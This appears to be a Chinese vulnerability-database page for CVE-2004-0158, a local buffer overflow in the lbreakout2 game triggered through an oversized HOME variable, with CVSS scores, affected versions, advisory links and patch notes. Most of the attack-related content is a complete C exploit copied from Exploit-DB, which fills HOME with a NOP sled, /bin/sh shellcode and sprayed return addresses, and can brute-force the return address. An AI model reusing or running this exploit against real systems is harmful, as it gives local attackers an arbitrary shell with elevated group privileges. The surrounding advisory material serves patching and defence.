CVE-2004-0158
CVSS4.6
发布时间 :2004-03-29 00:00:00
修订时间 :2016-10-17 22:41:15
NMCOES    

[原文]Buffer overflow in lbreakout2 allows local users to gain 'games' group privileges via a large HOME environment variable to (1) editor.c, (2) theme.c, (3) manager.c, (4) config.c, (5) game.c, (6) levels.c, or (7) main.c.


[CNNVD]LGames LBreakout2多个环境变量缓冲区溢出漏洞(CNNVD-200403-132)

        
        lbreakout2是一款Linux下的游戏程序。
        lbreakout2对多个环境变量缺少充分缓冲区边界检查,本地攻击者可以利用这个漏洞以'games'组权限执行任意指令。
        目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:lgames:lbreakout2:2.2
cpe:/a:lgames:lbreakout2:2.0.1
cpe:/a:lgames:lbreakout2:2.2.2
cpe:/a:lgames:lbreakout2:2.0
cpe:/a:lgames:lbreakout2:2.1
cpe:/a:lgames:lbreakout2:2.1.1
cpe:/a:lgames:lbreakout2:2.1.2
cpe:/a:lgames:lbreakout2:2.2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0158
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0158
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-132
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107755821705356&w=2
(UNKNOWN)  BUGTRAQ  20040222 lbreakout2 < 2.4beta-2 local exploit
http://security.debian.org/pool/updates/main/l/lbreakout2/lbreakout2_2.2.2-1woody1.diff.gz
(UNKNOWN)  CONFIRM  http://security.debian.org/pool/updates/main/l/lbreakout2/lbreakout2_2.2.2-1woody1.diff.gz
http://www.debian.org/security/2004/dsa-445
(VENDOR_ADVISORY)  DEBIAN  DSA-445
http://www.securityfocus.com/bid/9712
(VENDOR_ADVISORY)  BID  9712
http://xforce.iss.net/xforce/xfdb/15229
(VENDOR_ADVISORY)  XF  breakout2-home-bo(15229)

- 漏洞信息

LGames LBreakout2多个环境变量缓冲区溢出漏洞
中危 边界条件错误
2004-03-29 00:00:00 2005-10-20 00:00:00
本地  
        
        lbreakout2是一款Linux下的游戏程序。
        lbreakout2对多个环境变量缺少充分缓冲区边界检查,本地攻击者可以利用这个漏洞以'games'组权限执行任意指令。
        目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2004/dsa-445

- 漏洞信息 (23738)

LGames LBreakout2 2.2.2 Multiple Environment Variable Buffer Overflow Vulnerabilites (EDBID:23738)
linux local
2004-02-21 Verified
0 Li0n7
N/A [点击下载]
source: http://www.securityfocus.com/bid/9712/info

Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application.

A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process.

/* 
 * lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr
 * vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>
 * usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>

#define BSIZE 200
#define D_START 0xbfffffff
#define PATH "/usr/local/bin/lbreakout2"

void exec_vuln();
int tease();
int make_string(long ret_addr);
int bruteforce(long start);
void banner(char *argv);

char shellcode[]=
      "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
      "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

char *buffer,*ptr;

int 
main(int argc,char *argv[])
{
      char * option_list = "br:s:";
      int option,brute = 0,opterr = 0;
      long ret,start = D_START;

      if (argc < 2) banner(argv[0]);

      while((option = getopt(argc,argv,option_list)) != -1)
          switch(option)
          {
              case 'b':
                  brute = 1;
                  break;
              case 'r':
                  ret = strtoul(optarg,NULL,0);
                  make_string(ret);
                  tease();
                  exit(1);
                  break;
              case 's':
                  start = strtoul(optarg,NULL,0);
                  break;
              case '?':
                  fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
                  banner(argv[0]);
                  exit(1);
          }

      if(brute) 
          bruteforce(start);

      return 0;
}

void 
exec_vuln()
{
      execl(PATH,PATH,NULL);
}

int 
tease()
{
      pid_t pid;
      pid_t wpid;
      int status;

      pid = fork();

      if (pid == -1)
      {
          fprintf(stderr, "[-] %s: Failed to fork()\n",strerror(errno));
          exit(13);
      } 
      else if (pid == 0)
      {
          exec_vuln();
      } 
      else  
      {
          wpid = wait(&status);
          if (wpid == -1)
          {
              fprintf(stderr,"[-] %s: wait()\n",strerror(errno));
              return 1;
          } 
          else if (wpid != pid)
              abort();
          else 
          {
              if (WIFEXITED(status))
              {
                  fprintf(stdout,"[+] Exited: shell's ret code = %d\n",WEXITSTATUS(status));
                  return WEXITSTATUS(status);
              } 
              else if (WIFSIGNALED(status))
                  return WTERMSIG(status);  
              else 
                  fprintf(stderr,"[-] Stopped.\n");
          }
      }
      return 1;
}

int 
make_string(long ret_addr)
{
      int i;
      long ret,addr,*addr_ptr;    
      
      buffer = (char *)malloc(1024);
      if(!buffer)
      {
          fprintf(stderr,"[-] Can't allocate memory\n");
          exit(-1);
      }

      ret = ret_addr;

      ptr = buffer;

      memset(ptr,0x90,BSIZE-strlen(shellcode));
      ptr += BSIZE-strlen(shellcode);

      memcpy(ptr,shellcode,strlen(shellcode));
      ptr += strlen(shellcode);

      addr_ptr = (long *)ptr;
      for(i=0;i<200;i++)
          *(addr_ptr++) = ret;
      ptr = (char *)addr_ptr;
      *ptr = 0;
  
      setenv("HOME",buffer,1);
      return 0;
}

int 
bruteforce(long start)
{
      int ret;
      long i;

      fprintf(stdout,"[+] Starting bruteforcing...\n");
 
      for(i=start;i<0;i=i-50) 
      {
          fprintf(stdout,"[+] Testing 0x%x...\n",i);
          make_string(i);
          ret=tease();
          if(ret==0)
          {
              fprintf(stdout,"[+] Ret address found: 0x%x\n",i);
              break;
          }
      }
      
      return 0;
}

void 
banner(char *argv)
{
      fprintf(stderr,"lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr\n");
      fprintf(stderr,"vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>\n");
      fprintf(stderr,"usage: %s [-r <RET>][-b [-s <STARTING_RET>]]\n",argv);
      exit(1);
}
		

- 漏洞信息

16570
LBreakout2 lbreakout2 HOME Environment Variable Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Unknown Vendor Verified

- 漏洞描述

A local overflow exists in LBreakout2. This issue exist because of a boundary error in the handling of certain environment variables resulting in a buffer overflow. With a specially crafted request, a malicious user can cause cause a buffer overflow and potentially execute code with group "games" privileges resulting in a loss of integrity or availability.

- 时间线

2004-02-22 Unknow
Unknow 2004-06-12

- 解决方案

Upgrade to version 2.5beta-6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

LGames LBreakout2 Multiple Environment Variable Buffer Overflow Vulnerabilites
Boundary Condition Error 9712
No Yes
2004-02-21 12:00:00 2009-07-12 03:06:00
Discovery of this issue is credited to Ulf Harnhammar.

- 受影响的程序版本

Lgames LBreakout2 2.2.2
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Lgames LBreakout2 2.2.1
Lgames LBreakout2 2.2
Lgames LBreakout2 2.2
Lgames LBreakout2 2.1.2
Lgames LBreakout2 2.1.1
Lgames LBreakout2 2.1
Lgames LBreakout2 2.0.1
Lgames LBreakout2 2.0

- 漏洞讨论

Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application.

A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process.

- 漏洞利用

The following exploit was released:

- 解决方案

Debian Linux has released advisory DSA 445-1 dealing with this issue.


Lgames LBreakout2 2.2.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站